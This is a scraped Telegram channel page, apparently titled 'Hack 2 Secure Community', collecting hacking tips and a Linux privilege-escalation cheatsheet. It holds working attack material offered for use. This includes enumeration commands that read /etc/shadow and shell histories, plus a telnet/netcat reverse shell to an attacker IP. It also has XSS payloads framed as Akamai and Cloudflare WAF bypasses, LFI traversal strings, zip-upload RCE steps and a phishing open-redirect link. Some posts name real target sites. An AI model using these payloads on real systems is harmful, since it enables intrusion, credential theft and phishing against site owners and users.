'>\"\n\n4. Using \"javascript:\" in the URL to execute a payload, such as \"javascript:alert(1)\"\n\n5. Using \"data:\" in the URL to execute a payload, such as \"data:text/html,\"\n\n6. Using \"Vbscript\" instead of javascript","datePublished":"2023-10-07T14:40:16Z","dateModified":"2023-10-07T14:40:16Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":521},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":2}]}},{"@type":"ListItem","position":3,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/39","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/39","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/39","headline":"http://modxcomputers.com","articleBody":"http://modxcomputers.com","datePublished":"2023-09-28T15:36:15Z","dateModified":"2023-09-28T15:36:15Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":503}]}},{"@type":"ListItem","position":4,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/38","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/38","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/38","headline":"Don't Ignore wordpress websites :) Payload:
\">","datePublished":"2023-09-27T10:14:34Z","dateModified":"2023-09-27T10:14:34Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":509}]}},{"@type":"ListItem","position":5,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/36","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/36","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/36","headline":"Bug Bounty Tip When the app only accepts URLs with a specific scheme, try injecting javascript://test.com The…","articleBody":"Bug Bounty Tip\n\nWhen the app only accepts URLs \nwith a specific scheme, try\ninjecting javascript://test.com\n\nThen, use these symbols \nto craft an XSS payload\n🔹%0a\n🔹%0d\n🔹%E2%80%A8\n🔹%E2%80%A9\n\n✅ javascript://test.com%0aalert(1)","datePublished":"2023-09-25T06:46:49Z","dateModified":"2023-09-25T06:46:49Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":542}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/35","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/35","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/35","headline":"A nice way to store the payload \">\n\nA payload to bypass Akamai WAF\n \nClick Here","datePublished":"2023-09-25T06:44:05Z","dateModified":"2023-09-25T06:44:05Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":504}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/34","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/34","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/34","headline":"Bug Bounty Hunting Tip :- If you can upload .zip file on target then: 1. Create a .php file (rce.php) 2. Comp…","articleBody":"Bug Bounty Hunting Tip :-\n\nIf you can upload .zip file on target then:\n\n1. Create a .php file (rce.php)\n\n2. Compress it to a .zip file (file.zip)\n\n3. Upload your .zip file on the vulnerable web application.\n\n4. Trigger your RCE via:\n\n( https://.com/index.php?page=zip://path/file.zip#rce.php )","datePublished":"2023-09-25T06:43:44Z","dateModified":"2023-09-25T06:43:44Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":490}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/33","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/33","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/33","headline":"Some filter bypass payload list while hunting for LFi vulnerability →index.php?page=....//....//etc/passwd →i…","articleBody":"Some filter bypass payload list while hunting for LFi vulnerability\n\n\n→index.php?page=....//....//etc/passwd\n→index.php?page=..///////..////..//////etc/passwd\n→index.php?page=/var/www/../../etc/passwd","datePublished":"2023-09-25T06:43:02Z","dateModified":"2023-09-25T06:43:02Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":448}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/32","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/32","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/32","headline":"Cloudflare Bypass [XSS] ⚡️ ☠️PAYLOAD☠️ ","articleBody":"Cloudflare Bypass [XSS] ⚡️\n\n☠️PAYLOAD☠️\n\n","datePublished":"2023-09-18T19:16:23Z","dateModified":"2023-09-18T19:16:23Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":438},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/31","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/31","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/31","headline":"OTP bypass - Response Manipulation","articleBody":"OTP bypass - Response Manipulation","datePublished":"2023-09-18T14:13:52Z","dateModified":"2023-09-18T14:13:52Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":436},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/30","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/30","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/30","headline":"💀🔥 Wordpress Exploit","articleBody":"💀🔥 Wordpress Exploit","datePublished":"2023-09-15T11:55:23Z","dateModified":"2023-09-15T11:55:23Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":404},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":4}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/29","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/29","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/29","headline":"https://www.w3docs.com/tools/html-encoder/","articleBody":"https://www.w3docs.com/tools/html-encoder/","datePublished":"2023-09-12T18:59:39Z","dateModified":"2023-09-12T18:59:39Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":408}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/28","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/28","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/28","headline":"this is for filter evasion where your script get encode in html encoding","articleBody":"this is for filter evasion where your script get encode in html encoding","datePublished":"2023-09-12T18:54:51Z","dateModified":"2023-09-12T18:54:51Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":395}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/25","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/25","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/25","headline":"Numb ASCII ANSI 8859 UTF-8 Description 32 space 33 ! ! ! ! exclamation mark 34 \" \" \" \" quotation mark 35 # #…","articleBody":"Numb ASCII ANSI 8859 UTF-8 Description\n32 space\n33 ! ! ! ! exclamation mark\n34 \" \" \" \" quotation mark\n35 # # # # number sign\n36 $ $ $ $ dollar sign\n37 % % % % percent sign\n38 & & & & ampersand\n39 ' ' ' ' apostrophe\n40 ( ( ( ( left parenthesis\n41 ) ) ) ) right parenthesis\n42 * * * * asterisk\n43 + + + + plus sign\n44 , , , , comma\n45 - - - - hyphen-minus\n46 . . . . full stop\n47 / / / / solidus\n48 0 0 0 0 digit zero\n49 1 1 1 1 digit one\n50 2 2 2 2 digit two\n51 3 3 3 3 digit three\n52 4 4 4 4 digit four\n53 5 5 5 5 digit five\n54 6 6 6 6 digit six\n55 7 7 7 7 digit seven\n56 8 8 8 8 digit eight\n57 9 9 9 9 digit nine\n58 : : : : colon\n59 ; ; ; ; semicolon\n60 < < < < less-than sign\n61 = = = = equals sign\n62 > > > > greater-than sign\n63 ? ? ? ? question mark\n64 @ @ @ @ commercial at\n65 A A A A Latin capital letter A\n66 B B B B Latin capital letter B\n67 C C C C Latin capital letter C\n68 D D D D Latin capital letter D\n69 E E E E Latin capital letter E\n70 F F F F Latin capital letter F\n71 G G G G Latin capital letter G\n72 H H H H Latin capital letter H\n73 I I I I Latin capital letter I\n74 J J J J Latin capital letter J\n75 K K K K Latin capital letter K\n76 L L L L Latin capital letter L\n77 M M M M Latin capital letter M\n78 N N N N Latin capital letter N\n79 O O O O Latin capital letter O\n80 P P P P Latin capital letter P\n81 Q Q Q Q Latin capital letter Q\n82 R R R R Latin capital letter R\n83 S S S S Latin capital letter S\n84 T T T T Latin capital letter T\n85 U U U U Latin capital letter U\n86 V V V V Latin capital letter V\n87 W W W W Latin capital letter W\n88 X X X X Latin capital letter X\n89 Y Y Y Y Latin capital letter Y\n90 Z Z Z Z Latin capital letter Z\n91 [ [ [ [ left square bracket\n92 \\ \\ \\ \\ reverse solidus\n93 ] ] ] ] right square bracket\n94 ^ ^ ^ ^ circumflex accent\n95 _ _ _ _ low line\n96 grave accent\n97 a a a a Latin small letter a\n98 b b b b Latin small letter b\n99 c c c c Latin small letter c\n100 d d d d Latin small letter d\n101 e e e e Latin small letter e\n102 f f f f Latin small letter f\n103 g g g g Latin small letter g\n104 h h h h Latin small letter h\n105 i i i i Latin small letter i\n106 j j j j Latin small letter j\n107 k k k k Latin small letter k\n108 l l l l Latin small letter l\n109 m m m m Latin small letter m\n110 n n n n Latin small letter n\n111 o o o o Latin small letter o\n112 p p p p Latin small letter p\n113 q q q q Latin small letter q\n114 r r r r Latin small letter r\n115 s s s s Latin small letter s\n116 t t t t Latin small letter t\n117 u u u u Latin small letter u\n118 v v v v Latin small letter v\n119 w w w w Latin small letter w\n120 x x x x Latin small letter x\n121 y y y y Latin small letter y\n122 z z z z Latin small letter z\n123 { { { { left curly bracket\n124 | | | | vertical line\n125 } } } } right curly bracket\n126 ~ ~ ~ ~ tilde\n127 DEL \n128 € euro sign\n129 NOT USED\n130 ‚ single low-9 quotation mark\n131 ƒ Latin small letter f with hook\n132 „ double low-9 quotation mark\n133 … horizontal ellipsis\n134 † dagger\n135 ‡ double dagger\n136 ˆ modifier letter circumflex accent\n137 ‰ per mille sign\n138 Š Latin capital letter S with caron\n139 ‹ single left-pointing angle quotation mark\n140 Œ Latin capital ligature OE\n141 NOT USED\n142 Ž Latin capital letter Z with caron\n143 NOT USED\n144 NOT USED\n145 ‘ left single quotation mark\n146 ’ right single quotation mark\n147 “ left double quotation mark","datePublished":"2023-09-12T18:54:09Z","dateModified":"2023-09-12T18:54:09Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":403}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/24","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/24","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/24","headline":"XSS encoding method - ","articleBody":"XSS encoding method - ","datePublished":"2023-09-10T15:08:53Z","dateModified":"2023-09-10T15:08:53Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":321}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/23","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/23","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/23","headline":" \n \n ","datePublished":"2023-09-10T15:08:33Z","dateModified":"2023-09-10T15:08:33Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":334}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/22","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/22","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/22","headline":"https://www.cu.edu.pk/login.php?msg=1&hash=eccbc87e4b5ce2fe28308fd9f2a7baf3","articleBody":"https://www.cu.edu.pk/login.php?msg=1&hash=eccbc87e4b5ce2fe28308fd9f2a7baf3","datePublished":"2023-09-10T14:47:02Z","dateModified":"2023-09-10T14:47:02Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":330}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/21","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/21","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/21","headline":"Indian News Channels ☕️😭","articleBody":"Indian News Channels ☕️😭","datePublished":"2023-09-10T09:38:39Z","dateModified":"2023-09-10T09:38:39Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":319}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/20","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/20","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/20","headline":"For Phishing URL Redirection - https://bluesrt.com/go?url=","articleBody":"For Phishing URL Redirection - https://bluesrt.com/go?url=","datePublished":"2023-09-09T05:08:37Z","dateModified":"2023-09-09T05:08:37Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":320},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":1}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/19","url":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/19","mainEntityOfPage":"https://telemetr.io/ch/channels/1804596241-hack2secure/posts/19","headline":"Exploiting XSS - Meta Tag 😎🔥","articleBody":"Exploiting XSS - Meta Tag 😎🔥","datePublished":"2023-09-09T03:28:49Z","dateModified":"2023-09-09T03:28:49Z","author":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"publisher":{"@type":"Organization","name":"Hack 2 Secure Community","url":"https://telemetr.io/ch/channels/1804596241-hack2secure","image":"https://img.tlmtr.io/c/1Y7TUZ/6091482202895400121?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":314},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":3}]}}]}𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
What's the kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are been running by root? Of these services, which are vulnerable
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
tcpdump tcp dst
192.168.1.7 80 and tcp dst
10.5.5.252 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/
config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Some examples of XSS payloads that can be used to bypass WAFs include:
1. Using JavaScript encoding, such as "eval(String.fromCharCode(97,108,101,114,116))" instead of "alert" to bypass keyword filters.
2. Using the JavaScript "img" element and "onerror" attribute to execute a payload, such as "
"
3. Using the JavaScript "iframe" element and "srcdoc" attribute to execute a payload, such as ""
4. Using "javascript:" in the URL to execute a payload, such as "javascript:alert(1)"
5. Using "data:" in the URL to execute a payload, such as "data:text/html,"
6. Using "Vbscript" instead of javascript
Don't Ignore wordpress websites :)
Payload:
Bug Bounty Tip
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9
✅ javascript://test.com%0aalert(1)
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here
Bug Bounty Hunting Tip :-
If you can upload .zip file on target then:
1. Create a .php file (rce.php)
2. Compress it to a .zip file (
file.zip )
3. Upload your .zip file on the vulnerable web application.
4. Trigger your RCE via:
( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )
Some filter bypass payload list while hunting for LFi vulnerability
→index.php?page=....//....//etc/passwd
→index.php?page=..///////..////..//////etc/passwd
→index.php?page=/var/www/../../etc/passwd
Cloudflare Bypass [XSS] ⚡️
☠️PAYLOAD☠️
OTP bypass - Response Manipulation
this is for filter evasion where your script get encode in html encoding
Numb ASCII ANSI 8859 UTF-8 Description
32 space
33 ! ! ! ! exclamation mark
34 " " " " quotation mark
35 # # # # number sign
36 $ $ $ $ dollar sign
37 % % % % percent sign
38 & & & & ampersand
39 ' ' ' ' apostrophe
40 ( ( ( ( left parenthesis
41 ) ) ) ) right parenthesis
42 * * * * asterisk
43 + + + + plus sign
44 , , , , comma
45 - - - - hyphen-minus
46 . . . . full stop
47 / / / / solidus
48 0 0 0 0 digit zero
49 1 1 1 1 digit one
50 2 2 2 2 digit two
51 3 3 3 3 digit three
52 4 4 4 4 digit four
53 5 5 5 5 digit five
54 6 6 6 6 digit six
55 7 7 7 7 digit seven
56 8 8 8 8 digit eight
57 9 9 9 9 digit nine
58 : : : : colon
59 ; ; ; ; semicolon
60 < < < < less-than sign
61 = = = = equals sign
62 > > > > greater-than sign
63 ? ? ? ? question mark
64 @ @ @ @ commercial at
65 A A A A Latin capital letter A
66 B B B B Latin capital letter B
